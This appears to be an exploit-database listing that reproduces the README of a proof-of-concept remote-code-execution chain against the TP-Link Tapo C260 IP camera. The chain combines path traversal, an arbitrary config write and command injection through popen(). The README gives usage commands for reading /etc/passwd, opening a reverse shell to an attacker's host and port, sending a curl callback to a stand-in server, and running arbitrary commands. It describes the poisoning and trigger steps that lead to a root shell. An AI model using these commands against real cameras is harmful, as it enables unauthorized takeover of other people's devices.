Exploit for Path Traversal in Tp-Link Tapo_C260_Firmware CVE-2026-0651 CVE-2026-0652 CVE-2026-0653

Name: Exploit for Path Traversal in Tp-Link Tapo_C260_Firmware CVE-2026-0651 CVE-2026-0652 CVE-2026-0653
Rating: 5 (8 reviews)
2026-06-25 | CVSS 8.8
## https://sploitus.com/exploit?id=25DE60F3-D53C-5F5C-9C45-E27FA387E1AA
# Tapo C260 RCE Chain (CVE-2026-0651 / CVE-2026-0652 / CVE-2026-0653)

Proof-of-concept exploit chain for TP-Link Tapo C260 IP camera achieving **unauthenticated-to-root RCE** by chaining three vulnerabilities discovered by [Eugene Lim (Spaceraccoon)](https://spaceraccoon.dev).

## Credit

**All vulnerability research and discovery by [Eugene Lim (@spaceraccoon)](https://spaceraccoon.dev/getting-shell-tapo-c260-webcam/).**

This repo is a PoC implementation based on his public writeup. If you find this useful, go buy his book:
[From Day Zero to Zero Day: A Hands-On Guide to Vulnerability Research (No Starch Press)](https://nostarch.com/).

## Vulnerability Chain

| CVE | Type | Impact |
|-----|------|--------|
| CVE-2026-0651 | Path Traversal / Local File Disclosure | Read arbitrary files via `/%2e%2e%2f` in the HTTP GET handler |
| CVE-2026-0652 | Arbitrary Config Write | Guest-level users can write to any config path via JSON key manipulation in the cloud API |
| CVE-2026-0653 | Command Injection / Privilege Escalation | `set_region_code_handle` passes unsanitized `dev_name` config value to `popen()` |

### Kill Chain

```
LFD (read device config) --> Config Write (poison dev_name) --> Trigger region code handler --> popen() --> shell
```

## Requirements

- Python 3.8+
- Network access to the camera (for LFD) **or** a valid TP-Link cloud auth token (for RCE)
- Guest-level credentials are sufficient for the full chain

## Install

```bash
git clone https://github.com//tapo-c260-rce.git
cd tapo-c260-rce
pip install -r requirements.txt
```

## Usage

### Local File Disclosure (CVE-2026-0651)

Read arbitrary files from a camera on the local network:

```bash
python lfd.py --host 192.168.1.100 --token  --file /etc/passwd
```

### Full RCE Chain (CVE-2026-0651 + CVE-2026-0652 + CVE-2026-0653)

```bash
# Reverse shell
python exploit.py \
  --cloud-host aps1-app-server.iot.i.tplinkcloud.com \
  --device-id  \
  --cloud-token  \
  --lhost  \
  --lport 4444

# Callback only (curl ping)
python exploit.py \
  --cloud-host aps1-app-server.iot.i.tplinkcloud.com \
  --device-id  \
  --cloud-token  \
  --callback http://your-server.com/pwned

# Custom command
python exploit.py \
  --cloud-host aps1-app-server.iot.i.tplinkcloud.com \
  --device-id  \
  --cloud-token  \
  --cmd "id > /tmp/pwned"
```

## How It Works

1. **Poison** — Sends a `setLedStatus` request with manipulated JSON keys that writes a shell metacharacter payload into the `tp_manage/info/dev_name` config path on the device.

2. **Trigger** — Sends a `set_region_code` request. The handler reads `dev_name` from config and interpolates it into a `popen()` call without sanitization, executing the injected command.

3. **Shell** — The attacker receives a callback or reverse shell.

## Affected Firmware

- TP-Link Tapo C260 (pre-patch firmware)
- Potentially other Tapo models sharing the same `/bin/main` omnibus binary

## Disclaimer

This tool is provided for **authorized security testing and educational purposes only**. Unauthorized access to computer systems is illegal. The authors are not responsible for misuse. Always obtain explicit permission before testing against any device you do not own.

## References

- [Original Writeup — Spaceraccoon](https://spaceraccoon.dev/getting-shell-tapo-c260-webcam/)
- [Kennedn's Tapo Protocol Research](https://github.com/kennedn)
- [TP-Link Security Advisory](https://www.tp-link.com/us/support/faq/)